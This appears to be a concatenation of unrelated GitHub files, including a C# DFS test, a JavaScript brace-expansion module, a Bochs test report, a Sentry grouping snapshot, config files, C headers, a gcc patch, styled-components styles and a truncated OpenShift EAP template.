expectedSpecialName = TestConfig.ValidNETBIOSPath; } foreach (DFS_REFERRAL_V3V4_NameListReferral entry in respV3) { if (!containValidDC) { foreach (string dcName in entry.DCNameArray) { BaseTestSite.Log.Add(LogEntryKind.Debug, "DC name is {0}", dcName); containValidDC = dcName.Equals(expectedDCName, StringComparison.OrdinalIgnoreCase); } } BaseTestSite.Assert.AreEqual(expectedSpecialName, entry.SpecialName, @"SpecialName must be \" + expectedSpecialName); BaseTestSite.Assert.AreEqual(timeToLive, entry.TimeToLive, "TimeToLive must be the same"); BaseTestSite.Assert.AreEqual((ushort)ReferralEntryType_Values.DFS_REFERRAL_V3, entry.VersionNumber, "VersionNumber must be set to " + ReferralEntryType_Values.DFS_REFERRAL_V3.ToString()); BaseTestSite.Assert.AreEqual(ReferralEntryFlags_Values.NameListReferral, entry.ReferralEntryFlags, "NameListReferral MUST be set to 1 for DC referral"); timeToLive = entry.TimeToLive; } BaseTestSite.Assert.IsTrue(containValidDC, "DCName must be " + expectedDCName); } } }
{ "pile_set_name": "Github" }
var concatMap = require('concat-map'); var balanced = require('balanced-match'); module.exports = expandTop; var escSlash = '\0SLASH'+Math.random()+'\0'; var escOpen = '\0OPEN'+Math.random()+'\0'; var escClose = '\0CLOSE'+Math.random()+'\0'; var escComma = '\0COMMA'+Math.random()+'\0'; var escPeriod = '\0PERIOD'+Math.random()+'\0'; function numeric(str) { return parseInt(str, 10) == str ? parseInt(str, 10) : str.charCodeAt(0); } function escapeBraces(str) { return str.split('\\\\').join(escSlash) .split('\\{').join(escOpen) .split('\\}').join(escClose) .split('\\,').join(escComma) .split('\\.').join(escPeriod); } function unescapeBraces(str) { return str.split(escSlash).join('\\') .split(escOpen).join('{') .split(escClose).join('}') .split(escComma).join(',') .split(escPeriod).join('.'); } // Basically just str.split(","), but handling cases // where we have nested braced sections, which should be // treated as individual members, like {a,{b,c},d} function parseCommaParts(str) { if (!str) return ['']; var parts = []; var m = balanced('{', '}', str); if (!m) return str.split(','); var pre = m.pre; var body = m.body; var post = m.post; var p = pre.split(','); p[p.length-1] += '{' + body + '}'; var postParts = parseCommaParts(post); if (post.length) { p[p.length-1] += postParts.shift(); p.push.apply(p, postParts); } parts.push.apply(parts, p); return parts; } function expandTop(str) { if (!str) return []; // I don't know why Bash 4.3 does this, but it does. // Anything starting with {} will have the first two bytes preserved // but *only* at the top level, so {},a}b will not expand to anything, // but a{},b}c will be expanded to [a}c,abc]. // One could argue that this is a bug in Bash, but since the goal of // this module is to match Bash's rules, we escape a leading {} if (str.substr(0, 2) === '{}') { str = '\\{\\}' + str.substr(2); } return expand(escapeBraces(str), true).map(unescapeBraces); } function identity(e) { return e; } function embrace(str) { return '{' + str + '}'; } function isPadded(el) { return /^-?0\d/.test(el); } function lte(i, y) { return i <= y; } function gte(i, y) { return i >= y; } function expand(str, isTop) { var expansions = []; var m = balanced('{', '}', str); if (!m || /\$$/.test(m.pre)) return [str]; var isNumericSequence = /^-?\d+\.\.-?\d+(?:\.\.-?\d+)?$/.test(m.body); var isAlphaSequence = /^[a-zA-Z]\.\.[a-zA-Z](?:\.\.-?\d+)?$/.test(m.body); var isSequence = isNumericSequence || isAlphaSequence; var isOptions = m.body.indexOf(',') >= 0; if (!isSequence && !isOptions) { // {a},b} if (m.post.match(/,.*\}/)) { str = m.pre + '{' + m.body + escClose + m.post; return expand(str); } return [str]; } var n; if (isSequence) { n = m.body.split(/\.\./); } else { n = parseCommaParts(m.body); if (n.length === 1) { // x{{a,b}}y ==> x{a}y x{b}y n = expand(n[0], false).map(embrace); if (n.length === 1) { var post = m.post.length ? expand(m.post, false) : ['']; return post.map(function(p) { return m.pre + n[0] + p; }); } } } // at this point, n is the parts, and we know it's not a comma set // with a single entry. // no need to expand pre, since it is guaranteed to be free of brace-sets var pre = m.pre; var post = m.post.length ? expand(m.post, false) : ['']; var N; if (isSequence) { var x = numeric(n[0]); var y = numeric(n[1]); var width = Math.max(n[0].length, n[1].length) var incr = n.length == 3 ? 
Math.abs(numeric(n[2])) : 1; var test = lte; var reverse = y < x; if (reverse) { incr *= -1; test = gte; } var pad = n.some(isPadded); N = []; for (var i = x; test(i, y); i += incr) { var c; if (isAlphaSequence) { c = String.fromCharCode(i); if (c === '\\') c = ''; } else { c = String(i); if (pad) { var need = width - c.length; if (need > 0) { var z = new Array(need + 1).join('0'); if (i < 0) c = '-' + z + c.slice(1); else c = z + c; } } } N.push(c); } } else { N = concatMap(n, function(el) { return expand(el, false) }); } for (var j = 0; j < N.length; j++) { for (var k = 0; k < post.length; k++) { var expansion = pre + N[j] + post[k]; if (!isTop || isSequence || expansion) expansions.push(expansion); } } return expansions; }
{ "pile_set_name": "Github" }
What is the date? [5/29/2001] What is your name? [Bryce Denney] What is your email address? [bryce dot denney at bigfoot dot com] Do you mind if your name and email address are placed on a testing results web page so that people with a similar setup can write to you? [X] Ok, put it on a web page [ ] No, keep my address private. What type of hardware are you using, e.g. 500MHz Intel Celeron. [PowerPC G4 with 384meg RAM] What operating system are you using? Please be specific, e.g. Redhat Linux 6.2 with 2.2.16 kernel. [MacOS X, build 3K78] What version of bochs are you using? [ ] compiled from version 1.0 (3/25/2000 snapshot) [ ] compiled from version 1.1 (bugfix1) [ ] compiled from version 1.1.1 (bugfix2) [ ] compiled from version 1.1.2 (bugfix3) [X] compiled from version 1.2-pre1 [ ] I compiled it from the CVS sources from date: [__] [ ] other source distribution from URL: [__] [ ] binary distribution from URL: [__] Please fill in the next few questions only if you compiled Bochs yourself, as opposed to downloading a binary. Did the configure script run ok, and detect your hardware and operating system? [ ] Yes [ ] No, configure crashed. [X] No, configure ran ok but produced a bad configuration. [ ] No, I cannot run configure on my platform (win32 and mac). If you used configure, what arguments did you give it? If you used a .conf.* script, give the name of the .conf script instead. [ NOTE: This was done on a system that has no X windows libraries! ./configure (no args): it said it could not find X windows libraries, then it set itself up for X windows anyway. This failed of course. If I install X windows I'll try it again. ./configure --with-term: could not find mvaddch in any of the three libraries it searched (curses, ncurses, termlib). So I changed configure.in to search for waddch instead of mvwaddch, ran autoconf again, and it said that waddch is found in curses. However it still will not build because of a few missing functions: keypad(), set_curs(), and nodelay(). It's only complaining about "implicit declaration" of these; they may actually be in the library but not the header? ./configure --with-rfb: worked great! Not tested much though. ] What compiler did you use? (Please include version.) [Reading specs from /usr/libexec/gcc/darwin/ppc/2.95.2/specs Apple Computer, Inc. version gcc-926, based on gcc version 2.95.2 19991024 (release) ] Did Bochs compile clean without any hacking? [X] Yes, once I started using RFB mode. [ ] No If you had to make changes to compile, please summarize the problems you had or include diffs. [./configure --with-rfb works fine X will probably be ok if I ever install it. ] End of compile-specific questions! What guest operating system are you using inside bochs? [4meg linux image from web site] Are you booting from a floppy or hard disk? [ ] floppy image [ ] raw floppy drive [X] hard drive image [ ] raw hard drive (is this even possible?) [ ] other [__] Did the guest operating system boot successfully? [X] Yes [ ] No If no, what error messages do you see on the console or in the log file? [__] What applications worked under this guest operating system? [not time to run many, this machine is very slow] What applications failed under this guest operating system? Did the application function incorrectly, crash Bochs, or what? If you got a panic, paste in the panic message that you received with some description of what was happening at the time. [none yet] The remaining questions are about Bochs features that you may not have used. 
If you tried out the feature, move the X to the "works" or "fails" column. Not Works tested ok Fails Comments? floppy disk [X] [ ] [ ] [__] raw floppy disk [X] [ ] [ ] [__] hard disk [ ] [X] [ ] [__] floating point [X] [ ] [ ] [__] mouse [X] [ ] [ ] [__] cdrom [X] [ ] [ ] [__] sb16 [X] [ ] [ ] [__] ne2000 [X] [ ] [ ] [__] i440FX pci [X] [ ] [ ] [__] debugger [X] [ ] [ ] [__] external loader [X] [ ] [ ] [__] VGA [X] [ ] [ ] [__] Thank you for your contribution in the Bochs testing effort! Please mail completed forms to [email protected].
{ "pile_set_name": "Github" }
--- created: '2020-02-26T19:54:24.690252Z' creator: sentry source: tests/sentry/grouping/test_variants.py --- app: hash: null component: app (exception of system takes precedence) exception (ignored because hash matches system variant) stacktrace frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" lineno (line number is not used if module or filename are available) 49 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "testMethod" lineno (line number is not used if module or filename are available) 43 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 38 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "eval" lineno (line number is not used if module or filename are available) 1 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test" lineno (line number is not used if module or filename are available) 32 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test/<" lineno (line number is not used if module or filename are available) 33 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callback" lineno (line number is not used if module or filename are available) 24 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callAnotherThing" lineno (line number is not used if module or filename are available) 19 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 18 type* "Error" value* "bad" -------------------------------------------------------------------------- system: hash: "be36642f41f047346396f018f62375d3" component: system* exception* stacktrace frame filename (ignored because filename is a URL) "/private/tmp/test.html" lineno (line number is not used if module or filename are available) 49 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "testMethod" lineno (line number is not used if module or filename are available) 43 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 38 frame filename (ignored because 
filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "eval" lineno (line number is not used if module or filename are available) 1 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test" lineno (line number is not used if module or filename are available) 32 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test/<" lineno (line number is not used if module or filename are available) 33 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callback" lineno (line number is not used if module or filename are available) 24 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callAnotherThing" lineno (line number is not used if module or filename are available) 19 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 18 type* "Error" value* "bad"
{ "pile_set_name": "Github" }
[general]
ffmpeg_path: ffmpeg | avconv | none if using vlc
vlc_path: /path/to/vlc
videos: [
    {
        'title': "A New Hope",
        'movie_path': "/path/to/movie-file",
        'subtitle_path': "subs/Star_Wars_Episode_IV.srt",
        'slug': 'hope',
    },
    {
        'title': "The Empire Strikes Back",
        'movie_path': "/path/to/movie-file",
        'subtitle_path': "subs/Star_Wars_Episode_V.srt",
        'slug': 'empire',
    },
    {
        'title': "The Return of the Jedi",
        'movie_path': "/path/to/movie-file",
        'subtitle_path': "subs/Star_Wars_Episode_VI.srt",
        'slug': 'return',
    },
    {
        'title': "The Force Awakens",
        'movie_path': "/path/to/movie-file",
        'subtitle_path': "subs/Star_Wars_Episode_VII.srt",
        'slug': 'awakens',
    },
    {
        'title': "The Last Jedi",
        'movie_path': "/path/to/movie-file",
        'subtitle_path': "subs/Star_Wars_Episode_VIII.srt",
        'slug': 'last',
    },
]

[imgur]
client_id: imgur_client_id
api_key: imgur_client_secret

[twitter]
app_key: twitter_app_key
app_secret: twitter_app_secret
oauth_token: twitter_oauth_token
oauth_token_secret: twitter_oauth_token_secret

[tumblr]
consumer_key: tumblr_consumer_key
consumer_secret: tumblr_consumer_secret
oauth_token: tumblr_oauth_token
oauth_token_secret: tumblr_oauth_token_secret
{ "pile_set_name": "Github" }
/* * SonarQube * Copyright (C) 2009-2020 SonarSource SA * mailto:info AT sonarsource DOT com * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 3 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package org.sonarqube.ws.client.almsettings; import javax.annotation.Generated; /** * This is a POST request. * @see <a href="https://next.sonarqube.com/sonarqube/web_api/api/alm_settings/create_bitbucket">Further information about this action online (including a response example)</a> * @since 8.1 */ @Generated("sonar-ws-generator") public class CreateBitbucketRequest { private String key; private String url; private String personalAccessToken; /** * This is a mandatory parameter. */ public CreateBitbucketRequest setKey(String key) { this.key = key; return this; } public String getKey() { return key; } /** * This is a mandatory parameter. */ public CreateBitbucketRequest setPersonalAccessToken(String personalAccessToken) { this.personalAccessToken = personalAccessToken; return this; } public String getPersonalAccessToken() { return personalAccessToken; } /** * This is a mandatory parameter. */ public CreateBitbucketRequest setUrl(String url) { this.url = url; return this; } public String getUrl() { return url; } }
{ "pile_set_name": "Github" }
generatorName: groovy
outputDir: samples/client/petstore/groovy
inputSpec: modules/openapi-generator/src/test/resources/3_0/petstore.yaml
templateDir: modules/openapi-generator/src/main/resources/Groovy
additionalProperties:
  hideGenerationTimestamp: "true"
{ "pile_set_name": "Github" }
////////////////////////////////////////////////////////////////////
// Copyright (C) Alexander Telyatnikov, Ivan Keliukh, Yegor Anchishkin, SKIF Software, 1999-2013. Kiev, Ukraine
// All rights reserved
// This file was released under the GPLv2 on June 2015.
////////////////////////////////////////////////////////////////////

#ifndef __Zw_to_Nt__NameConvert__H__
#define __Zw_to_Nt__NameConvert__H__

#ifdef NT_NATIVE_MODE

#define ZwClose          NtClose
#define ZwOpenKey        NtOpenKey
#define ZwQueryValueKey  NtQueryValueKey

//#define ExAllocatePool(hernya,size)  MyGlobalAlloc(size)
//#define ExFreePool(addr)             MyGlobalFree((PVOID)(addr))

#endif //NT_NATIVE_MODE

#endif //__Zw_to_Nt__NameConvert__H__
{ "pile_set_name": "Github" }
commit 8570c4be394cff7282f332f97da2ff569a927ddb
Author: Imre Kaloz <[email protected]>
Date:   Wed Feb 2 20:06:12 2011 +0000

    fixup arm soft-float symbols

    SVN-Revision: 25325

--- a/libgcc/config/arm/t-linux
+++ b/libgcc/config/arm/t-linux
@@ -1,6 +1,10 @@
 LIB1ASMSRC = arm/lib1funcs.S
 LIB1ASMFUNCS = _udivsi3 _divsi3 _umodsi3 _modsi3 _dvmd_lnx _clzsi2 _clzdi2 \
-	_ctzsi2 _arm_addsubdf3 _arm_addsubsf3
+	_ctzsi2 _arm_addsubdf3 _arm_addsubsf3 \
+	_arm_negdf2 _arm_muldivdf3 _arm_cmpdf2 _arm_unorddf2 \
+	_arm_fixdfsi _arm_fixunsdfsi _arm_truncdfsf2 \
+	_arm_negsf2 _arm_muldivsf3 _arm_cmpsf2 _arm_unordsf2 \
+	_arm_fixsfsi _arm_fixunssfsi
 
 # Just for these, we omit the frame pointer since it makes such a big
 # difference.
--- a/gcc/config/arm/linux-elf.h
+++ b/gcc/config/arm/linux-elf.h
@@ -58,8 +58,6 @@
 %{shared:-lc} \
 %{!shared:%{profile:-lc_p}%{!profile:-lc}}"
 
-#define LIBGCC_SPEC "%{mfloat-abi=soft*:-lfloat} -lgcc"
-
 #define GLIBC_DYNAMIC_LINKER "/lib/ld-linux.so.2"
 
 #define LINUX_TARGET_LINK_SPEC "%{h*} \
{ "pile_set_name": "Github" }
//Generated at 2012-07-03 18:44:06 /* * Copyright (c) 2010 - 2011 Espressif System * */ #ifndef UART_REGISTER_H_INCLUDED #define UART_REGISTER_H_INCLUDED #define REG_UART_BASE( i ) (0x60000000+(i)*0xf00) //version value:32'h062000 #define UART_FIFO( i ) (REG_UART_BASE( i ) + 0x0) #define UART_RXFIFO_RD_BYTE 0x000000FF #define UART_RXFIFO_RD_BYTE_S 0 #define UART_INT_RAW( i ) (REG_UART_BASE( i ) + 0x4) #define UART_RXFIFO_TOUT_INT_RAW (BIT(8)) #define UART_BRK_DET_INT_RAW (BIT(7)) #define UART_CTS_CHG_INT_RAW (BIT(6)) #define UART_DSR_CHG_INT_RAW (BIT(5)) #define UART_RXFIFO_OVF_INT_RAW (BIT(4)) #define UART_FRM_ERR_INT_RAW (BIT(3)) #define UART_PARITY_ERR_INT_RAW (BIT(2)) #define UART_TXFIFO_EMPTY_INT_RAW (BIT(1)) #define UART_RXFIFO_FULL_INT_RAW (BIT(0)) #define UART_INT_ST( i ) (REG_UART_BASE( i ) + 0x8) #define UART_RXFIFO_TOUT_INT_ST (BIT(8)) #define UART_BRK_DET_INT_ST (BIT(7)) #define UART_CTS_CHG_INT_ST (BIT(6)) #define UART_DSR_CHG_INT_ST (BIT(5)) #define UART_RXFIFO_OVF_INT_ST (BIT(4)) #define UART_FRM_ERR_INT_ST (BIT(3)) #define UART_PARITY_ERR_INT_ST (BIT(2)) #define UART_TXFIFO_EMPTY_INT_ST (BIT(1)) #define UART_RXFIFO_FULL_INT_ST (BIT(0)) #define UART_INT_ENA( i ) (REG_UART_BASE( i ) + 0xC) #define UART_RXFIFO_TOUT_INT_ENA (BIT(8)) #define UART_BRK_DET_INT_ENA (BIT(7)) #define UART_CTS_CHG_INT_ENA (BIT(6)) #define UART_DSR_CHG_INT_ENA (BIT(5)) #define UART_RXFIFO_OVF_INT_ENA (BIT(4)) #define UART_FRM_ERR_INT_ENA (BIT(3)) #define UART_PARITY_ERR_INT_ENA (BIT(2)) #define UART_TXFIFO_EMPTY_INT_ENA (BIT(1)) #define UART_RXFIFO_FULL_INT_ENA (BIT(0)) #define UART_INT_CLR( i ) (REG_UART_BASE( i ) + 0x10) #define UART_RXFIFO_TOUT_INT_CLR (BIT(8)) #define UART_BRK_DET_INT_CLR (BIT(7)) #define UART_CTS_CHG_INT_CLR (BIT(6)) #define UART_DSR_CHG_INT_CLR (BIT(5)) #define UART_RXFIFO_OVF_INT_CLR (BIT(4)) #define UART_FRM_ERR_INT_CLR (BIT(3)) #define UART_PARITY_ERR_INT_CLR (BIT(2)) #define UART_TXFIFO_EMPTY_INT_CLR (BIT(1)) #define UART_RXFIFO_FULL_INT_CLR (BIT(0)) #define UART_CLKDIV( i ) (REG_UART_BASE( i ) + 0x14) #define UART_CLKDIV_CNT 0x000FFFFF #define UART_CLKDIV_S 0 #define UART_AUTOBAUD( i ) (REG_UART_BASE( i ) + 0x18) #define UART_GLITCH_FILT 0x000000FF #define UART_GLITCH_FILT_S 8 #define UART_AUTOBAUD_EN (BIT(0)) #define UART_STATUS( i ) (REG_UART_BASE( i ) + 0x1C) #define UART_TXD (BIT(31)) #define UART_RTSN (BIT(30)) #define UART_DTRN (BIT(29)) #define UART_TXFIFO_CNT 0x000000FF #define UART_TXFIFO_CNT_S 16 #define UART_RXD (BIT(15)) #define UART_CTSN (BIT(14)) #define UART_DSRN (BIT(13)) #define UART_RXFIFO_CNT 0x000000FF #define UART_RXFIFO_CNT_S 0 #define UART_CONF0( i ) (REG_UART_BASE( i ) + 0x20) #define UART_TXFIFO_RST (BIT(18)) #define UART_RXFIFO_RST (BIT(17)) #define UART_IRDA_EN (BIT(16)) #define UART_TX_FLOW_EN (BIT(15)) #define UART_LOOPBACK (BIT(14)) #define UART_IRDA_RX_INV (BIT(13)) #define UART_IRDA_TX_INV (BIT(12)) #define UART_IRDA_WCTL (BIT(11)) #define UART_IRDA_TX_EN (BIT(10)) #define UART_IRDA_DPLX (BIT(9)) #define UART_TXD_BRK (BIT(8)) #define UART_SW_DTR (BIT(7)) #define UART_SW_RTS (BIT(6)) #define UART_STOP_BIT_NUM 0x00000003 #define UART_STOP_BIT_NUM_S 4 #define UART_BIT_NUM 0x00000003 #define UART_BIT_NUM_S 2 #define UART_PARITY_EN (BIT(1)) #define UART_PARITY (BIT(0)) #define UART_CONF1( i ) (REG_UART_BASE( i ) + 0x24) #define UART_RX_TOUT_EN (BIT(31)) #define UART_RX_TOUT_THRHD 0x0000007F #define UART_RX_TOUT_THRHD_S 24 #define UART_RX_FLOW_EN (BIT(23)) #define UART_RX_FLOW_THRHD 0x0000007F #define UART_RX_FLOW_THRHD_S 16 #define 
UART_TXFIFO_EMPTY_THRHD 0x0000007F #define UART_TXFIFO_EMPTY_THRHD_S 8 #define UART_RXFIFO_FULL_THRHD 0x0000007F #define UART_RXFIFO_FULL_THRHD_S 0 #define UART_LOWPULSE( i ) (REG_UART_BASE( i ) + 0x28) #define UART_LOWPULSE_MIN_CNT 0x000FFFFF #define UART_LOWPULSE_MIN_CNT_S 0 #define UART_HIGHPULSE( i ) (REG_UART_BASE( i ) + 0x2C) #define UART_HIGHPULSE_MIN_CNT 0x000FFFFF #define UART_HIGHPULSE_MIN_CNT_S 0 #define UART_PULSE_NUM( i ) (REG_UART_BASE( i ) + 0x30) #define UART_PULSE_NUM_CNT 0x0003FF #define UART_PULSE_NUM_CNT_S 0 #define UART_DATE( i ) (REG_UART_BASE( i ) + 0x78) #define UART_ID( i ) (REG_UART_BASE( i ) + 0x7C) #endif // UART_REGISTER_H_INCLUDED
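The register map above follows the usual mask/shift convention: each multi-bit field has a value mask (e.g. UART_RXFIFO_CNT) and a shift suffix macro (UART_RXFIFO_CNT_S). The sketch below is only an illustration of how such macros are typically combined to read a field; the REG_READ helper is invented for this example (the vendor SDK provides its own register-access macros), so treat it as an assumption rather than part of this header.

/* Illustrative sketch only: combining the mask and _S (shift) macros above.
 * REG_READ is a made-up helper for the example; the real SDK supplies its
 * own register-access macros. */
#include <stdint.h>

#define REG_READ(addr)  (*(volatile uint32_t *)(addr))

/* Number of bytes currently waiting in UART0's RX FIFO. */
static inline uint32_t uart0_rx_fifo_count(void)
{
    uint32_t status = REG_READ(UART_STATUS(0));
    return (status >> UART_RXFIFO_CNT_S) & UART_RXFIFO_CNT;
}

/* Pop one received byte from UART0's FIFO register. */
static inline uint8_t uart0_read_byte(void)
{
    return (uint8_t)(REG_READ(UART_FIFO(0)) & UART_RXFIFO_RD_BYTE);
}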
{ "pile_set_name": "Github" }
// @flow /* eslint no-eval: 0 */ // $FlowFixMe import styled, { css } from 'styled-components'; import { Gradient, Shadow, Transition, hexa } from '../globals'; const baseButton = css` display: flex; flex: none; align-self: center; align-items: center; justify-content: center; border-radius: 12px; font-weight: 700; white-space: nowrap; word-break: keep-all; transition: ${Transition.hover.off}; cursor: pointer; font-size: 14px; line-height: 1; position: relative; text-align: center; padding: ${props => (props.icon ? '4px 8px 4px 4px' : '12px 16px')}; &:hover { transition: ${Transition.hover.on}; box-shadow: ${props => props.disabled ? 'none' : `${Shadow.high} ${hexa(props.theme.bg.reverse, 0.15)}`}; opacity: ${props => (props.disabled ? '0.5' : '1')}; } /* if an icon and label are both present, add space around the label*/ div + span, span + span { margin: 0 8px; } `; export const Label = styled.span` display: block; flex: 1 0 auto; line-height: inherit; color: inherit; ${props => (props.loading && !props.hasIcon ? 'opacity: 0;' : 'opacity: 1;')}; align-self: center; margin: auto; `; export const StyledSolidButton = styled.button` ${baseButton} background-color: ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : `brand.alt`}`)}; background-image: ${props => props.disabled || props.gradientTheme === 'none' ? 'none' : props.gradientTheme ? Gradient( eval(`props.theme.${props.gradientTheme}.alt`), eval(`props.theme.${props.gradientTheme}.default`) ) : Gradient(props.theme.brand.alt, props.theme.brand.default)}; color: ${props => props.theme.text.reverse}; &:hover { background-color: ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; } &:active { box-shadow: ${props => props.disabled ? 'none' : `${Shadow.low} ${hexa(props.theme.bg.reverse, 0.15)}`}; } `; export const StyledTextButton = styled(StyledSolidButton)` background: transparent; background-image: none; font-weight: 600; color: ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : 'text.alt'}`)}; transition: color 0.1s ease-out, box-shadow 0.2s ease-out 0.1s, border-radius 0.2s ease-out, padding: 0.2s ease-out; &:hover { background-color: transparent; box-shadow: none; color: ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; transition: color 0.1s ease-in, box-shadow 0.2s ease-in 0.1s, padding 0.2s ease-in; } `; export const StyledOutlineButton = styled(StyledTextButton)` box-shadow: inset 0 0 0 2px ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : 'brand.default'}`)}; color: ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : 'brand.default'}`)}; transition: ${Transition.hover.on}; &:hover { background-color: ${({ theme }) => theme.bg.default}; color: ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; box-shadow: inset 0 0 0 2px ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; transition: ${Transition.hover.on}; } `; export const StyledIconButton = styled.button` ${baseButton} padding: 0; width: 32px; height: 32px; background-color: transparent; color: ${props => props.disabled ? props.theme.inactive : props.color ? 
eval(`props.theme.${props.color}`) : props.theme.text.alt}; opacity: ${props => (props.opacity ? props.opacity : 1)}; &:hover { color: ${props => props.disabled ? props.theme.inactive : props.hoverColor ? eval(`props.theme.${props.hoverColor}`) : props.color ? eval(`props.theme.${props.color}`) : props.theme.brand.alt}; transform: ${props => (props.disabled ? 'none' : 'scale(1.05)')}; box-shadow: none; opacity: 1; } `; export const SpinnerContainer = styled.div` width: 32px; height: 32px; position: relative; `;
{ "pile_set_name": "Github" }
{ "created_at": "2015-02-27T22:28:30.828992", "description": "Sphinx Themes for Flask related projects and Flask itself", "fork": true, "full_name": "lepture/flask-sphinx-themes", "language": "Python", "updated_at": "2015-02-27T22:28:30.829750" }
{ "pile_set_name": "Github" }
/*
 *  NASA Docket No. GSC-18,370-1, and identified as "Operating System Abstraction Layer"
 *
 *  Copyright (c) 2019 United States Government as represented by
 *  the Administrator of the National Aeronautics and Space Administration.
 *  All Rights Reserved.
 *
 *  Licensed under the Apache License, Version 2.0 (the "License");
 *  you may not use this file except in compliance with the License.
 *  You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 *  Unless required by applicable law or agreed to in writing, software
 *  distributed under the License is distributed on an "AS IS" BASIS,
 *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *  See the License for the specific language governing permissions and
 *  limitations under the License.
 */

/* OSAL coverage stub replacement for shellLib.h */
#include <string.h>
#include <stdlib.h>
#include "utstubs.h"

#include <OCS_shellLib.h>

OCS_STATUS OCS_shellGenericInit(const char *config,
                                int         stackSize,
                                const char *shellName,
                                char      **pShellName,
                                OCS_BOOL    interactive,
                                OCS_BOOL    loginAccess,
                                int         fdin,
                                int         fdout,
                                int         fderr)
{
    return (UT_DEFAULT_IMPL(OCS_shellGenericInit));
}
{ "pile_set_name": "Github" }
{ "kind": "Template", "apiVersion": "v1", "metadata": { "annotations": { "iconClass": "icon-eap", "tags": "eap,javaee,java,jboss", "version": "1.4.8", "openshift.io/display-name": "JBoss EAP 6.4 + A-MQ (with https)", "openshift.io/provider-display-name": "Red Hat, Inc.", "description": "An example EAP 6 A-MQ application. For more information about using this template, see https://github.com/jboss-openshift/application-templates.", "template.openshift.io/long-description": "This template defines resources needed to develop Red Hat Enterprise Application Server 6.4 based application, including a build configuration, application deployment configuration, using Red Hat JBoss A-MQ with persistence and secure communication using https.", "template.openshift.io/documentation-url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/", "template.openshift.io/support-url": "https://access.redhat.com" }, "name": "eap64-amq-persistent-s2i" }, "labels": { "template": "eap64-amq-persistent-s2i", "xpaas": "1.4.8" }, "message": "A new EAP 6 and A-MQ persistent based application with SSL support has been created in your project. The username/password for accessing the A-MQ service is ${MQ_USERNAME}/${MQ_PASSWORD}. Please be sure to create the following secrets: \"${HTTPS_SECRET}\" containing the ${HTTPS_KEYSTORE} file used for serving secure content; \"${JGROUPS_ENCRYPT_SECRET}\" containing the ${JGROUPS_ENCRYPT_KEYSTORE} file used for securing JGroups communications.", "parameters": [ { "displayName": "Application Name", "description": "The name for the application.", "name": "APPLICATION_NAME", "value": "eap-app", "required": true }, { "displayName": "Custom http Route Hostname", "description": "Custom hostname for http service route. Leave blank for default hostname, e.g.: <application-name>-<project>.<default-domain-suffix>", "name": "HOSTNAME_HTTP", "value": "", "required": false }, { "displayName": "Custom https Route Hostname", "description": "Custom hostname for https service route. Leave blank for default hostname, e.g.: secure-<application-name>-<project>.<default-domain-suffix>", "name": "HOSTNAME_HTTPS", "value": "", "required": false }, { "displayName": "Git Repository URL", "description": "Git source URI for application", "name": "SOURCE_REPOSITORY_URL", "value": "https://github.com/jboss-developer/jboss-eap-quickstarts.git", "required": true }, { "displayName": "Git Reference", "description": "Git branch/tag reference", "name": "SOURCE_REPOSITORY_REF", "value": "6.4.x", "required": false }, { "displayName": "Context Directory", "description": "Path within Git project to build; empty for root project directory.", "name": "CONTEXT_DIR", "value": "helloworld-mdb", "required": false }, { "displayName": "A-MQ Volume Size", "description": "Size of the volume used by A-MQ for persisting messages.", "name": "VOLUME_CAPACITY", "value": "1Gi", "required": true }, { "displayName": "JMS Connection 